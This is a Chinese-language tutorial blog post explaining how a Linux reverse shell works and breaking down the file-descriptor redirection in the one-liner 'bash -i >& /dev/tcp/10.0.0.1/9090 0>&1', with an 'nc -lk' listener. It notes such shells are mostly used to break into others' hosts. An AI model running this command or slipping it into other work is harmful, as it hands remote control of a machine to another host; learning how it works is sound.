您好,登錄后才能下訂單哦!
這篇文章主要介紹“Linux的反彈shell命令的解析”,在日常操作中,相信很多人在Linux的反彈shell命令的解析問題上存在疑惑,小編查閱了各式資料,整理出簡單好用的操作方法,希望對大家解答”Linux的反彈shell命令的解析”的疑惑有所幫助!接下來,請跟著小編一起來學習吧!
1. 什么是反彈shell
簡單來說就是A主機可以通過執行B主機上的命令并且把返回值都返回到A上。
2. 反彈shell的用途
這個反彈shell大部分用途是用來侵入別人的主機。就是因為感覺很厲害的樣子,所以才來研究這家伙
3. 反彈shell操作步驟
3.1. 在本機開啟端口9090
nc -lk 9090
3.2. 在需要被控制的機器上執行如下兩種命令中的一種即可
bash -i >& /dev/tcp/10.0.0.1/9090 0>&1
3.3. 在本機剛才執行nc -lk 9090命令行下面輸入需要被控制的主機的命令即可
4. 原理
A主機開啟9090端口的tcp服務
B主機連接到A主機的9090的tcp服務
A主機通過tcp服務把命令發到B主機
B主機讀取命令并且在bash中執行
B主機把執行結果發給A主機
這樣就可以在A主機中'玩弄'B主機了
下面重點來了
我們看這個操作其實還是蠻簡單的,但是我們不能只局限于表面。我們需要去了解它的原理
其實nc -lk 9090命令沒什么可說的,百度google一搜就出來了。我們今天要去解釋的是bash -i >& /dev/tcp/10.0.0.1/9090 0>&1。這條命令在google也沒搜出來什么結果。所以只能自己加夜班搞了。
inux shell下常用的文件描述符是:
標準輸入 (stdin) :代碼為 0 ,使用 < 或 << ;
標準輸出 (stdout):代碼為 1 ,使用 > 或 >> ;
標準錯誤輸出(stderr):代碼為 2 ,使用 2> 或 2>>。
首先我們把這個命令拆解一下
bash -i # 這個也不知道說啥 >& # 這條命令 其實就是把stderr也輸入到 stdout。它相當于 `> xxx 2>&1` /dev/tcp/10.0.0.1/9090 # 這個就是連接到10.0.0.1的9090端口 0>&1 # 這個在google百度上查了半天也沒搞懂,只能去研究文檔
其實前面3個命令組合在一起很好理解,就是把這個bash下的所有輸出都發送到 10.0.0.1:9090。這個大家可以自己操作一下,去掉后面的 0>&1。
我們在命令里面寫 2>&1都很好理解,就是把error重定向到stdout。但是0>&1好像不太好理解,我們看下文件描述符
這里看到的是2>&1就是把文件描述符2對應的設備改成了文件描述符1對應的設備。那么同理 0>&1就是把 0對應的設備改成的1對應的設備,那也就是socket。這就表明了 stdin就是從socket中讀取數據,然后再執行命令,把bash的命令行返回內容通過stdout發到socket。
其實這些內容都可以在bash的man pages里面找到
文檔里面寫的很清楚 n<&word 是吧word復制給n, n>&word是吧word復制給n。
所以這里寫 0<&1 或者是 0>&1都是可以的,只要把文件描述符1對應的設備復制給文件描述符0就可以了
到此,關于“Linux的反彈shell命令的解析”的學習就結束了,希望能夠解決大家的疑惑。理論與實踐的搭配能更好的幫助大家學習,快去試試吧!若想繼續學習更多相關知識,請繼續關注億速云網站,小編會繼續努力為大家帶來更多實用的文章!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。